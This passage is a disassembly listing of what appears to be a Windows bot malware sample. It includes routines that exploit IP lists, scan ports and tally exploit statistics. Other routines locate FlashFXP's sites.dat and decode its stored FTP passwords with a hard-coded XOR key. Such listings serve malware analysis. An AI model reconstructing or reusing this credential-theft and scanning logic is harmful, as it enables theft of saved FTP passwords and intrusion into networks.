call sub_409763
pop ecx
xor eax, eax
leave
retn 4
sub_413CB3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_413FE7 proc near ; CODE XREF: sub_40A9CF+B5B�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
cmp [ebp+arg_4], 0
jnz short loc_413FF3
jmp short locret_414050
; ---------------------------------------------------------------------------
loc_413FF3: ; CODE XREF: sub_413FE7+8�j
push 327h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_414009
jmp short locret_414050
; ---------------------------------------------------------------------------
loc_414009: ; CODE XREF: sub_413FE7+1E�j
push 180h
push [ebp+arg_4]
mov eax, [ebp+var_4]
add eax, 4
push eax
call sub_407A56
add esp, 0Ch
push 1A3h
push [ebp+arg_0]
mov eax, [ebp+var_4]
add eax, 184h
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push offset aAttemptingToEx ; "Attempting to exploit IP's in list."
push 0
push [ebp+var_4]
push offset sub_413CB3
call sub_4095A4
add esp, 10h
locret_414050: ; CODE XREF: sub_413FE7+A�j
; sub_413FE7+20�j
leave
retn
sub_413FE7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414052 proc near ; DATA XREF: sub_41417D+35�o
var_3C0 = dword ptr -3C0h
var_3BC = byte ptr -3BCh
var_225 = byte ptr -225h
var_224 = byte ptr -224h
var_218 = byte ptr -218h
var_204 = dword ptr -204h
var_200 = byte ptr -200h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 3C0h
push 1A7h
push [ebp+arg_0]
lea eax, [ebp+var_3C0]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
push offset aExploitStatist ; "Exploit statistics - "
lea eax, [ebp+var_200]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
and [ebp+var_204], 0
jmp short loc_4140A4
; ---------------------------------------------------------------------------
loc_414097: ; CODE XREF: sub_414052:loc_41414A�j
mov eax, [ebp+var_204]
inc eax
mov [ebp+var_204], eax
loc_4140A4: ; CODE XREF: sub_414052+43�j
mov eax, [ebp+var_204]
imul eax, 3Ah
movsx eax, ds:byte_41CD80[eax]
test eax, eax
jz loc_41414F
push 12h
mov eax, [ebp+var_204]
imul eax, 3Ah
add eax, offset byte_41CD80
push eax
lea eax, [ebp+var_218]
push eax
call sub_407A56
add esp, 0Ch
lea eax, [ebp+var_218]
push eax
call sub_4105FB
pop ecx
lea eax, [ebp+var_218]
push eax
lea eax, [ebp+var_200]
push eax
call sub_416B70 ; strcat
pop ecx
pop ecx
mov eax, [ebp+var_204]
imul eax, 3Ah
push ds:dword_41CDAA[eax]
push offset dword_41D054
lea eax, [ebp+var_200]
push eax
call sub_416B40 ; strlen
pop ecx
lea eax, [ebp+eax+var_200]
push eax
call sub_416B5E ; sprintf
add esp, 0Ch
movsx eax, [ebp+var_225]
test eax, eax
jz short loc_41414A
mov eax, [ebp+var_204]
imul eax, 3Ah
and ds:dword_41CDAA[eax], 0
loc_41414A: ; CODE XREF: sub_414052+E6�j
jmp loc_414097
; ---------------------------------------------------------------------------
loc_41414F: ; CODE XREF: sub_414052+64�j
and [ebp+var_224], 0
lea eax, [ebp+var_200]
push eax
lea eax, [ebp+var_3BC]
push eax
call sub_40D53F
pop ecx
pop ecx
push [ebp+var_3C0]
call sub_409763
pop ecx
xor eax, eax
leave
retn 4
sub_414052 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41417D proc near ; CODE XREF: sub_40A9CF+BF4�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push 1A7h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_414197
jmp short locret_4141BF
; ---------------------------------------------------------------------------
loc_414197: ; CODE XREF: sub_41417D+16�j
push [ebp+arg_0]
mov eax, [ebp+var_4]
add eax, 4
push eax
call sub_405F67
pop ecx
pop ecx
push offset aListingExploit ; "Listing exploit statistics"
push 0
push [ebp+var_4]
push offset sub_414052
call sub_4095A4
add esp, 10h
locret_4141BF: ; CODE XREF: sub_41417D+18�j
leave
retn
sub_41417D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4141C1 proc near ; DATA XREF: sub_4142BF+E2�o
var_2BC = dword ptr -2BCh
var_2B8 = byte ptr -2B8h
var_1B8 = byte ptr -1B8h
var_1B2 = dword ptr -1B2h
var_1AE = byte ptr -1AEh
var_16 = byte ptr -16h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 2BCh
push 2B1h
push [ebp+arg_0]
lea eax, [ebp+var_2BC]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
call sub_416B64 ; clock
mov [ebp+var_4], eax
push [ebp+var_1B2]
push 0
lea eax, [ebp+var_1B8]
push eax
lea eax, [ebp+var_2B8]
push eax
call sub_4050EA
add esp, 10h
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jz short loc_41424F
push [ebp+var_8]
call sub_4053B1
pop ecx
call sub_416B64 ; clock
sub eax, [ebp+var_4]
push eax
lea eax, [ebp+var_1B8]
push eax
lea eax, [ebp+var_2B8]
push eax
push offset dword_41D100
lea eax, [ebp+var_1AE]
push eax
call sub_40D53F
add esp, 14h
jmp short loc_4142AD
; ---------------------------------------------------------------------------
loc_41424F: ; CODE XREF: sub_4141C1+56�j
movsx eax, [ebp+var_16]
test eax, eax
jnz short loc_4142AD
call sub_416B64 ; clock
sub eax, [ebp+var_4]
cmp eax, [ebp+var_1B2]
jb short loc_41428B
lea eax, [ebp+var_1B8]
push eax
lea eax, [ebp+var_2B8]
push eax
push offset dword_41D0C8
lea eax, [ebp+var_1AE]
push eax
call sub_40D53F
add esp, 10h
jmp short loc_4142AD
; ---------------------------------------------------------------------------
loc_41428B: ; CODE XREF: sub_4141C1+A4�j
lea eax, [ebp+var_1B8]
push eax
lea eax, [ebp+var_2B8]
push eax
push offset dword_41D098
lea eax, [ebp+var_1AE]
push eax
call sub_40D53F
add esp, 10h
loc_4142AD: ; CODE XREF: sub_4141C1+8C�j
; sub_4141C1+94�j ...
push [ebp+var_2BC]
call sub_409763
pop ecx
xor eax, eax
leave
retn 4
sub_4141C1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4142BF proc near ; CODE XREF: sub_40A9CF+1B5E�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 10h
cmp [ebp+arg_4], 0
jnz short loc_4142D0
jmp locret_4143AE
; ---------------------------------------------------------------------------
loc_4142D0: ; CODE XREF: sub_4142BF+A�j
cmp [ebp+arg_8], 0
jnz short loc_4142DD
mov [ebp+arg_8], offset a80 ; "80"
loc_4142DD: ; CODE XREF: sub_4142BF+15�j
push [ebp+arg_8]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jz short loc_4142F8
cmp [ebp+var_8], 0FFFFh
jbe short loc_4142FD
loc_4142F8: ; CODE XREF: sub_4142BF+2E�j
jmp locret_4143AE
; ---------------------------------------------------------------------------
loc_4142FD: ; CODE XREF: sub_4142BF+37�j
cmp [ebp+arg_C], 0
jz short loc_414311
push [ebp+arg_C]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_10], eax
jmp short loc_414318
; ---------------------------------------------------------------------------
loc_414311: ; CODE XREF: sub_4142BF+42�j
mov [ebp+var_10], 0EA60h
loc_414318: ; CODE XREF: sub_4142BF+50�j
mov eax, [ebp+var_10]
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz short loc_41432D
cmp [ebp+var_4], 36EE80h
jbe short loc_41432F
loc_41432D: ; CODE XREF: sub_4142BF+63�j
jmp short locret_4143AE
; ---------------------------------------------------------------------------
loc_41432F: ; CODE XREF: sub_4142BF+6C�j
push 2B1h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jnz short loc_414345
jmp short locret_4143AE
; ---------------------------------------------------------------------------
loc_414345: ; CODE XREF: sub_4142BF+82�j
push 100h
push [ebp+arg_4]
mov eax, [ebp+var_C]
add eax, 4
push eax
call sub_407A56
add esp, 0Ch
push 6
push [ebp+arg_8]
mov eax, [ebp+var_C]
add eax, 104h
push eax
call sub_407A56
add esp, 0Ch
mov eax, [ebp+var_C]
mov ecx, [ebp+var_4]
mov [eax+10Ah], ecx
push [ebp+arg_0]
mov eax, [ebp+var_C]
add eax, 10Eh
push eax
call sub_405F67
pop ecx
pop ecx
push [ebp+arg_8]
push [ebp+arg_4]
push offset dword_41D130
push 0
push [ebp+var_C]
push offset sub_4141C1
call sub_4095A4
add esp, 18h
locret_4143AE: ; CODE XREF: sub_4142BF+C�j
; sub_4142BF:loc_4142F8�j ...
leave
retn
sub_4142BF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4143B0 proc near ; DATA XREF: sub_414600+1D6�o
var_2E8 = qword ptr -2E8h
var_2DC = dword ptr -2DCh
var_2D8 = dword ptr -2D8h
var_2D4 = byte ptr -2D4h
var_2D0 = dword ptr -2D0h
var_2CC = byte ptr -2CCh
var_2C4 = dword ptr -2C4h
var_2C0 = dword ptr -2C0h
var_2BC = byte ptr -2BCh
var_1BC = word ptr -1BCh
var_1BA = word ptr -1BAh
var_1B8 = dword ptr -1B8h
var_1B4 = dword ptr -1B4h
var_1B0 = byte ptr -1B0h
var_18 = byte ptr -18h
var_C = word ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 2DCh
push 2B3h
push [ebp+arg_0]
lea eax, [ebp+var_2C0]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
mov ax, [ebp+var_1BC]
mov [ebp+var_C], ax
push [ebp+var_1B4]
call sub_404D10
pop ecx
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jnz short loc_41440C
push [ebp+var_2C0]
call sub_409763
pop ecx
xor eax, eax
jmp locret_4145FC
; ---------------------------------------------------------------------------
loc_41440C: ; CODE XREF: sub_4143B0+47�j
push [ebp+var_1B4]
movzx eax, [ebp+var_1BA]
push eax
movzx eax, [ebp+var_1BC]
push eax
lea eax, [ebp+var_2BC]
push eax
mov eax, [ebp+var_2C0]
push dword ptr [eax]
push offset dword_41D1A0
lea eax, [ebp+var_1B0]
push eax
call sub_40D53F
add esp, 1Ch
movsx eax, [ebp+var_18]
test eax, eax
jnz short loc_414458
push 3E8h
call ds:dword_41709C ; Sleep
loc_414458: ; CODE XREF: sub_4143B0+9B�j
call sub_416B64 ; clock
mov [ebp+var_2C4], eax
and [ebp+var_4], 0
loc_414467: ; CODE XREF: sub_4143B0+13A�j
; sub_4143B0+1F0�j
mov eax, [ebp+var_2C0]
cmp dword ptr [eax+4], 0
jnz short loc_414482
movzx eax, [ebp+var_C]
movzx ecx, [ebp+var_1BA]
cmp eax, ecx
jle short loc_414487
loc_414482: ; CODE XREF: sub_4143B0+C1�j
jmp loc_4145A5
; ---------------------------------------------------------------------------
loc_414487: ; CODE XREF: sub_4143B0+D0�j
push 0Ah
lea eax, [ebp+var_2CC]
push eax
movzx eax, [ebp+var_C]
push eax
call sub_416F7A ; _itoa
add esp, 0Ch
push [ebp+var_8]
push 0
lea eax, [ebp+var_2CC]
push eax
lea eax, [ebp+var_2BC]
push eax
call sub_404FE7
add esp, 0Ch
push eax
call sub_404D4D
pop ecx
pop ecx
mov [ebp+var_2D0], eax
mov ax, [ebp+var_C]
add ax, 1
mov [ebp+var_C], ax
cmp [ebp+var_2D0], 0
jz short loc_4144EF
movzx eax, [ebp+var_C]
movzx ecx, [ebp+var_1BA]
cmp eax, ecx
jg short loc_4144EF
jmp loc_414467
; ---------------------------------------------------------------------------
loc_4144EF: ; CODE XREF: sub_4143B0+129�j
; sub_4143B0+138�j
push [ebp+var_1B8]
call ds:dword_41709C ; Sleep
push [ebp+var_8]
call sub_404E1C
pop ecx
test eax, eax
jz loc_414597
loc_41450C: ; CODE XREF: sub_4143B0+1E2�j
mov eax, [ebp+var_2C0]
cmp dword ptr [eax+4], 0
jz short loc_41451A
jmp short loc_414597
; ---------------------------------------------------------------------------
loc_41451A: ; CODE XREF: sub_4143B0+166�j
push [ebp+var_8]
call sub_404F24
pop ecx
mov [ebp+var_2D8], eax
cmp [ebp+var_2D8], 0
jnz short loc_414534
jmp short loc_414597
; ---------------------------------------------------------------------------
loc_414534: ; CODE XREF: sub_4143B0+180�j
lea eax, [ebp+var_2CC]
push eax
push [ebp+var_2D8]
call sub_4045B2
pop ecx
pop ecx
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
mov al, [ebp+var_18]
mov [ebp+var_2D4], al
and [ebp+var_18], 0
lea eax, [ebp+var_2CC]
push eax
lea eax, [ebp+var_2BC]
push eax
push offset dword_41D18C
lea eax, [ebp+var_1B0]
push eax
call sub_40D53F
add esp, 10h
mov al, [ebp+var_2D4]
mov [ebp+var_18], al
push 3E8h
call ds:dword_41709C ; Sleep
jmp loc_41450C
; ---------------------------------------------------------------------------
loc_414597: ; CODE XREF: sub_4143B0+156�j
; sub_4143B0+168�j ...
push [ebp+var_8]
call sub_404F7D
pop ecx
jmp loc_414467
; ---------------------------------------------------------------------------
loc_4145A5: ; CODE XREF: sub_4143B0:loc_414482�j
push [ebp+var_4]
call sub_416B64 ; clock
sub eax, [ebp+var_2C4]
mov [ebp+var_2DC], eax
fild [ebp+var_2DC]
fdiv ds:flt_417270
push ecx
push ecx
fstp [esp+2E8h+var_2E8]
lea eax, [ebp+var_2BC]
push eax
push offset unk_41D150
lea eax, [ebp+var_1B0]
push eax
call sub_40D53F
add esp, 18h
push [ebp+var_8]
call sub_404FD0
pop ecx
push [ebp+var_2C0]
call sub_409763
pop ecx
xor eax, eax
locret_4145FC: ; CODE XREF: sub_4143B0+57�j
leave
retn 4
sub_4143B0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414600 proc near ; CODE XREF: sub_40A9CF+C9C�p
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 28h
cmp [ebp+arg_4], 0
jz short loc_414612
cmp [ebp+arg_8], 0
jnz short loc_414617
loc_414612: ; CODE XREF: sub_414600+A�j
jmp locret_4147E3
; ---------------------------------------------------------------------------
loc_414617: ; CODE XREF: sub_414600+10�j
cmp [ebp+arg_C], 0
jnz short loc_414623
mov eax, [ebp+arg_8]
mov [ebp+arg_C], eax
loc_414623: ; CODE XREF: sub_414600+1B�j
push [ebp+arg_8]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jz short loc_41463E
cmp [ebp+var_8], 0FFFFh
jbe short loc_414643
loc_41463E: ; CODE XREF: sub_414600+33�j
jmp locret_4147E3
; ---------------------------------------------------------------------------
loc_414643: ; CODE XREF: sub_414600+3C�j
push [ebp+arg_C]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_14], eax
cmp [ebp+var_14], 0
jz short loc_41465E
cmp [ebp+var_14], 0FFFFh
jbe short loc_414663
loc_41465E: ; CODE XREF: sub_414600+53�j
jmp locret_4147E3
; ---------------------------------------------------------------------------
loc_414663: ; CODE XREF: sub_414600+5C�j
push 2B3h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_41467C
jmp locret_4147E3
; ---------------------------------------------------------------------------
loc_41467C: ; CODE XREF: sub_414600+75�j
mov eax, [ebp+var_8]
cmp eax, [ebp+var_14]
jbe short loc_414696
mov eax, [ebp+var_14]
mov [ebp+var_18], eax
mov eax, [ebp+var_8]
mov [ebp+var_14], eax
mov eax, [ebp+var_18]
mov [ebp+var_8], eax
loc_414696: ; CODE XREF: sub_414600+82�j
cmp [ebp+arg_10], 0
jz short loc_4146AA
push [ebp+arg_10]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_1C], eax
jmp short loc_4146B1
; ---------------------------------------------------------------------------
loc_4146AA: ; CODE XREF: sub_414600+9A�j
mov [ebp+var_1C], 7D0h
loc_4146B1: ; CODE XREF: sub_414600+A8�j
mov eax, [ebp+var_1C]
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jz short loc_4146C6
cmp [ebp+var_C], 0EA60h
jbe short loc_4146CD
loc_4146C6: ; CODE XREF: sub_414600+BB�j
mov [ebp+var_C], 7D0h
loc_4146CD: ; CODE XREF: sub_414600+C4�j
cmp [ebp+arg_14], 0
jz short loc_4146E1
push [ebp+arg_14]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_20], eax
jmp short loc_4146E8
; ---------------------------------------------------------------------------
loc_4146E1: ; CODE XREF: sub_414600+D1�j
mov [ebp+var_20], 100h
loc_4146E8: ; CODE XREF: sub_414600+DF�j
mov eax, [ebp+var_20]
mov [ebp+var_10], eax
cmp [ebp+var_10], 0
jz short loc_4146FD
cmp [ebp+var_10], 200h
jbe short loc_414704
loc_4146FD: ; CODE XREF: sub_414600+F2�j
mov [ebp+var_10], 100h
loc_414704: ; CODE XREF: sub_414600+FB�j
push 100h
push [ebp+arg_4]
mov eax, [ebp+var_4]
add eax, 4
push eax
call sub_416B58 ; strncpy
add esp, 0Ch
mov eax, [ebp+var_4]
mov cx, word ptr [ebp+var_8]
mov [eax+104h], cx
mov eax, [ebp+var_4]
mov cx, word ptr [ebp+var_14]
mov [eax+106h], cx
cmp [ebp+var_C], 0EA60h
jbe short loc_414749
mov [ebp+var_24], 0EA60h
jmp short loc_41474F
; ---------------------------------------------------------------------------
loc_414749: ; CODE XREF: sub_414600+13E�j
mov eax, [ebp+var_C]
mov [ebp+var_24], eax
loc_41474F: ; CODE XREF: sub_414600+147�j
mov eax, [ebp+var_4]
mov ecx, [ebp+var_24]
mov [eax+108h], ecx
cmp [ebp+var_10], 200h
jbe short loc_41476D
mov [ebp+var_28], 200h
jmp short loc_414773
; ---------------------------------------------------------------------------
loc_41476D: ; CODE XREF: sub_414600+162�j
mov eax, [ebp+var_10]
mov [ebp+var_28], eax
loc_414773: ; CODE XREF: sub_414600+16B�j
mov eax, [ebp+var_4]
mov ecx, [ebp+var_28]
mov [eax+10Ch], ecx
push 1A3h
push [ebp+arg_0]
mov eax, [ebp+var_4]
add eax, 110h
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+var_4]
push dword ptr [eax+10Ch]
mov eax, [ebp+var_4]
movzx eax, word ptr [eax+106h]
push eax
mov eax, [ebp+var_4]
movzx eax, word ptr [eax+104h]
push eax
mov eax, [ebp+var_4]
add eax, 4
push eax
push offset dword_41D1E8
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax+18Bh]
neg eax
sbb eax, eax
inc eax
push eax
push [ebp+var_4]
push offset sub_4143B0
call sub_4095A4
add esp, 20h
locret_4147E3: ; CODE XREF: sub_414600:loc_414612�j
; sub_414600:loc_41463E�j ...
leave
retn
sub_414600 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4147E5 proc near ; CODE XREF: sub_414A1E+373�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
mov [ebp+var_8], offset aYa36za48dehfrv ; "yA36zA48dEhfrvghGRg57h5UlDv3"
lea eax, [ebp+var_10]
push eax
push offset dword_418B54
push [ebp+arg_4]
call sub_416BA2 ; sscanf
add esp, 0Ch
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_414816
xor eax, eax
jmp locret_4148CC
; ---------------------------------------------------------------------------
loc_414816: ; CODE XREF: sub_4147E5+28�j
mov eax, [ebp+arg_4]
inc eax
inc eax
mov [ebp+arg_4], eax
loc_41481E: ; CODE XREF: sub_4147E5:loc_4148BE�j
lea eax, [ebp+var_C]
push eax
push offset dword_418B54
push [ebp+arg_4]
call sub_416BA2 ; sscanf
add esp, 0Ch
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_414842
xor eax, eax
jmp locret_4148CC
; ---------------------------------------------------------------------------
loc_414842: ; CODE XREF: sub_4147E5+54�j
mov eax, [ebp+var_8]
movsx eax, byte ptr [eax]
mov ecx, [ebp+var_C]
xor ecx, eax
mov [ebp+var_C], ecx
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
mov eax, [ebp+var_10]
cmp eax, [ebp+var_C]
jl short loc_414866
mov eax, [ebp+var_C]
dec eax
mov [ebp+var_C], eax
loc_414866: ; CODE XREF: sub_4147E5+78�j
mov eax, [ebp+var_C]
sub eax, [ebp+var_10]
mov ecx, [ebp+arg_0]
mov [ecx], al
mov eax, [ebp+arg_0]
inc eax
mov [ebp+arg_0], eax
lea eax, [ebp+var_10]
push eax
push offset dword_418B54
push [ebp+arg_4]
call sub_416BA2 ; sscanf
add esp, 0Ch
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_414899
xor eax, eax
jmp short locret_4148CC
; ---------------------------------------------------------------------------
loc_414899: ; CODE XREF: sub_4147E5+AE�j
mov eax, [ebp+arg_4]
inc eax
inc eax
mov [ebp+arg_4], eax
mov eax, [ebp+var_8]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_4148B2
mov [ebp+var_8], offset aYa36za48dehfrv ; "yA36zA48dEhfrvghGRg57h5UlDv3"
loc_4148B2: ; CODE XREF: sub_4147E5+C4�j
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_4148BE
jmp short loc_4148C3
; ---------------------------------------------------------------------------
loc_4148BE: ; CODE XREF: sub_4147E5+D5�j
jmp loc_41481E
; ---------------------------------------------------------------------------
loc_4148C3: ; CODE XREF: sub_4147E5+D7�j
mov eax, [ebp+arg_0]
and byte ptr [eax], 0
push 1
pop eax
locret_4148CC: ; CODE XREF: sub_4147E5+2C�j
; sub_4147E5+58�j ...
leave
retn
sub_4147E5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4148CE proc near ; CODE XREF: sub_414A1E+30�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 20h
and [ebp+var_14], 0
lea eax, [ebp+var_14]
push eax
push 20019h
push 0
push offset aSoftwareClasse ; "SOFTWARE\\Classes\\Applications\\FlashFXP."...
push 80000002h
call ds:dword_417008 ; RegOpenKeyExA
mov [ebp+var_10], eax
mov [ebp+var_4], 104h
lea eax, [ebp+var_4]
push eax
push [ebp+arg_0]
push 0
push 0
push 0
push [ebp+var_14]
call ds:dword_41700C ; RegQueryValueExA
mov [ebp+var_10], eax
push [ebp+var_14]
call ds:dword_417028 ; RegCloseKey
cmp [ebp+var_10], 0
jnz short loc_414971
push offset aFlashfxp_exe1 ; "FlashFXP.exe %1"
push 4
push [ebp+arg_0]
call sub_407ACA
add esp, 0Ch
mov [ebp+var_18], eax
cmp [ebp+var_18], 0
jnz short loc_414945
jmp loc_414A17
; ---------------------------------------------------------------------------
loc_414945: ; CODE XREF: sub_4148CE+70�j
push offset aSites_dat ; "sites.dat"
push [ebp+var_18]
call sub_416B3A ; strcpy
pop ecx
pop ecx
mov eax, [ebp+var_18]
add eax, 0Fh
push eax
mov eax, [ebp+var_18]
add eax, 9
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
push 1
pop eax
jmp locret_414A1C
; ---------------------------------------------------------------------------
loc_414971: ; CODE XREF: sub_4148CE+55�j
; sub_4148CE:loc_414A17�j
push 104h
push [ebp+arg_0]
push offset aProgramfiles ; "ProgramFiles"
call ds:dword_417104 ; GetEnvironmentVariableA
push offset aFlashfxpSites_ ; "\\FlashFXP\\sites.dat"
push [ebp+arg_0]
call sub_416B70 ; strcat
pop ecx
pop ecx
push offset aRb ; "rb"
push [ebp+arg_0]
call sub_416B88 ; fopen
pop ecx
pop ecx
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jz short loc_4149B0
push 1
pop eax
jmp short locret_414A1C
; ---------------------------------------------------------------------------
loc_4149B0: ; CODE XREF: sub_4148CE+DB�j
mov eax, ds:dword_419398
mov [ebp+var_C], eax
loc_4149B8: ; CODE XREF: sub_4148CE+143�j
lea eax, [ebp+var_C]
push eax
call ds:dword_4170CC ; GetDriveTypeA
mov [ebp+var_1C], eax
cmp [ebp+var_1C], 5
jz short loc_414A02
cmp [ebp+var_1C], 2
jz short loc_414A02
lea eax, [ebp+var_C]
push eax
push offset aSflashfxpSites ; "%sFlashFXP\\sites.dat"
push [ebp+arg_0]
call sub_416B5E ; sprintf
add esp, 0Ch
push offset aRb ; "rb"
push [ebp+arg_0]
call sub_416B88 ; fopen
pop ecx
pop ecx
mov [ebp+var_20], eax
cmp [ebp+var_20], 0
jz short loc_414A02
push 1
pop eax
jmp short locret_414A1C
; ---------------------------------------------------------------------------
loc_414A02: ; CODE XREF: sub_4148CE+FB�j
; sub_4148CE+101�j ...
mov al, byte ptr [ebp+var_C]
add al, 1
mov byte ptr [ebp+var_C], al
movsx eax, byte ptr [ebp+var_C]
cmp eax, 5Ah
jnz short loc_4149B8
xor eax, eax
jmp short locret_414A1C
; ---------------------------------------------------------------------------
loc_414A17: ; CODE XREF: sub_4148CE+72�j
jmp loc_414971
; ---------------------------------------------------------------------------
locret_414A1C: ; CODE XREF: sub_4148CE+9E�j
; sub_4148CE+E0�j ...
leave
retn
sub_4148CE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414A1E proc near ; DATA XREF: sub_414EB0+35�o
var_5E0 = dword ptr -5E0h
var_5DC = dword ptr -5DCh
var_5D8 = dword ptr -5D8h
var_5D4 = dword ptr -5D4h
var_5D0 = dword ptr -5D0h
var_5CC = dword ptr -5CCh
var_5C8 = dword ptr -5C8h
var_5C4 = byte ptr -5C4h
var_544 = byte ptr -544h
var_4C4 = byte ptr -4C4h
var_444 = byte ptr -444h
var_3C4 = dword ptr -3C4h
var_3C0 = dword ptr -3C0h
var_3BC = dword ptr -3BCh
var_3B8 = dword ptr -3B8h
var_3B4 = byte ptr -3B4h
var_334 = dword ptr -334h
var_330 = byte ptr -330h
var_32C = dword ptr -32Ch
var_328 = byte ptr -328h
var_190 = byte ptr -190h
var_184 = dword ptr -184h
var_180 = byte ptr -180h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 5E0h
push 1A7h
push [ebp+arg_0]
lea eax, [ebp+var_32C]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
lea eax, [ebp+var_180]
push eax
call sub_4148CE
pop ecx
test eax, eax
jnz short loc_414A6B
push [ebp+var_32C]
call sub_409763
pop ecx
xor eax, eax
jmp locret_414EAC
; ---------------------------------------------------------------------------
loc_414A6B: ; CODE XREF: sub_414A1E+38�j
mov eax, [ebp+var_32C]
push dword ptr [eax]
push offset unk_41D3B8
lea eax, [ebp+var_328]
push eax
call sub_40D53F
add esp, 0Ch
and [ebp+var_184], 0
and [ebp+var_334], 0
mov al, [ebp+var_190]
mov [ebp+var_330], al
and [ebp+var_190], 0
push offset aRb ; "rb"
lea eax, [ebp+var_180]
push eax
call sub_416B88 ; fopen
pop ecx
pop ecx
mov [ebp+var_3C4], eax
cmp [ebp+var_3C4], 0
jnz short loc_414ACF
jmp loc_414EAA
; ---------------------------------------------------------------------------
loc_414ACF: ; CODE XREF: sub_414A1E+AA�j
push 2
push 0
push [ebp+var_3C4]
call sub_416B96 ; fseek
add esp, 0Ch
push [ebp+var_3C4]
call sub_416B76 ; ftell
pop ecx
mov [ebp+var_3C0], eax
cmp [ebp+var_3C0], 100000h
jnb short loc_414B0D
mov eax, [ebp+var_3C0]
mov [ebp+var_5E0], eax
jmp short loc_414B17
; ---------------------------------------------------------------------------
loc_414B0D: ; CODE XREF: sub_414A1E+DF�j
mov [ebp+var_5E0], 100000h
loc_414B17: ; CODE XREF: sub_414A1E+ED�j
mov eax, [ebp+var_5E0]
mov [ebp+var_3C0], eax
push 0
push 0
push [ebp+var_3C4]
call sub_416B96 ; fseek
add esp, 0Ch
mov eax, [ebp+var_3C0]
inc eax
push eax
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_3BC], eax
cmp [ebp+var_3BC], 0
jnz short loc_414B63
push [ebp+var_3C4]
call sub_416B82 ; fclose
pop ecx
jmp loc_414EA8
; ---------------------------------------------------------------------------
loc_414B63: ; CODE XREF: sub_414A1E+132�j
push [ebp+var_3C4]
push [ebp+var_3C0]
push 1
